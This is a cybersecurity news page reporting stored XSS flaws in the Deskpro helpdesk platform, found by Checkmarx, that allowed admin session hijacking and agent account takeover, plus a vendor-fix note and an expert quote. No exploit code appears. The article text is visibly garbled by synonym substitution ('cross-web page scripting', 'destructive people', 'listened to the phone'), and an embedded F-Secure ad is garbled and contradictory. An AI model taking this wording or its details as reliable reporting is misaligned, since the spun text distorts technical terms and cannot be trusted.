• Menu
  • Skip to main content
  • Skip to primary sidebar

The Cyber Security News

Latest Cyber Security News

Header Right

  • Latest News
  • Vulnerabilities
  • Cloud Services
Cyber Security News

Deskpro XSS flaws could hijack admin sessions, take over helpdesk agent accounts

You are here: Home / General Cyber Security News / Deskpro XSS flaws could hijack admin sessions, take over helpdesk agent accounts

Hackers could have exploited cross-web page scripting (XSS) vulnerabilities found in well known helpdesk platform Deskpro to hijack the sessions of administrators and takeover the accounts of helpdesk agents.

This would give the attackers the same privileges as admins and agents in phrases of what they could execute or details they are exposed to, according to a site by the Checkmarx researchers who discovered the flaw whilst auditing the platform. In specific circumstances, attackers could have reset the entire helpdesk, wiping all method facts.

Given the shift to distant get the job done and the want for helpdesk software that lets distant groups collaborate, Checkmarx audited Deskpro’s security as aspect of the company’s bug bounty application. Checkmarx researchers mentioned attackers could exploit the issue in two ways:

✔ Approved Seller by TheCyberSecurity.News From Our Partners
F Secure Safe 2021

Protect yourself against all threads using F-Seure. F-Seure is one of the first security companies which has never been backed up by any governments. It provides you with an award-winning security plus an optimum privacy.

Get F-Secure Safe with 65% discount from a bitdefender official seller SerialCart® (Limited Offer).

➤ Activate Your Coupon Code


Administrator session hijacking. This flaw had a CVSS score of 8.8, which security professionals think about higher. The issue was observed in Deskpro model 2020.2.9 operating in a docker container employing the official Deskpro docker graphic. Even so, the underlying difficulty – a stored XSS vulnerability – also impacts the cloud variation. Destructive people can execute arbitrary code in the victim’s browser to exfiltrate the session token. With the token in hand, malicious people could hijack victims’ classes and execute actions on their behalf.

Agent account takeover. This vulnerability was assigned a CVSS rating of 8.1, also thought of high. The issue was located in Deskpro 2020.2.9, functioning in a docker container applying the official Deskpro docker picture. Also in this instance, the stored XSS vulnerability has an effect on the cloud variation. Destructive consumers can execute arbitrary code in the victim’s browser, making it possible for them to acquire around a victim’s account.

This come across once more proves that there is no this kind of matter as error-absolutely free code, said Dirk Schrader, international vice president at New Net Technologies. Deskpro was swift in reacting to Checkmarx and in fixing the issue, he reported, although inquiring for a 90-day keep period, which he said was reasonable to get the the vast majority of installations patched.

“As usual, attackers will uncover people who have not listened to the phone,” Schrader reported. “Controlling all variations to your setting makes certain detection of unwanted variations, and scanning for vulnerabilities regularly with an up-to-date scanner ensures that – need to the get in touch with for patching have been skipped – an additional alarm receives lifted.”


Some areas of this report are sourced from:
www.scmagazine.com

Previous Post: «Cyber Security News India Calls Out Twitter for Differential Treatment

Reader Interactions

Leave a Reply Cancel reply

Your email address will not be published. Required fields are marked *

Primary Sidebar

Recent Posts

  • Deskpro XSS flaws could hijack admin sessions, take over helpdesk agent accounts
  • India Calls Out Twitter for Differential Treatment
  • Apax to Acquire Herjavec Group
  • Illinois Is State Hit Hardest by Cybercrime
  • Researchers Uncover Android Spying Campaign Targeting Pakistan Officials
  • Various Malware Lurks in Discord App to Target Gamers
  • What is Gaia-X? A guide to the EU’s unified cloud ecosystem
  • UK Govt Reveals Plans to Build Trust in Use of Digital Identities
  • Researchers identify 223 vulnerabilities used in recent ransomware attacks
  • #WomenInScience: High Number of Girls Sign Up for Codebreaking Contest

Copyright © TheCyberSecurity.News, All Rights Reserved.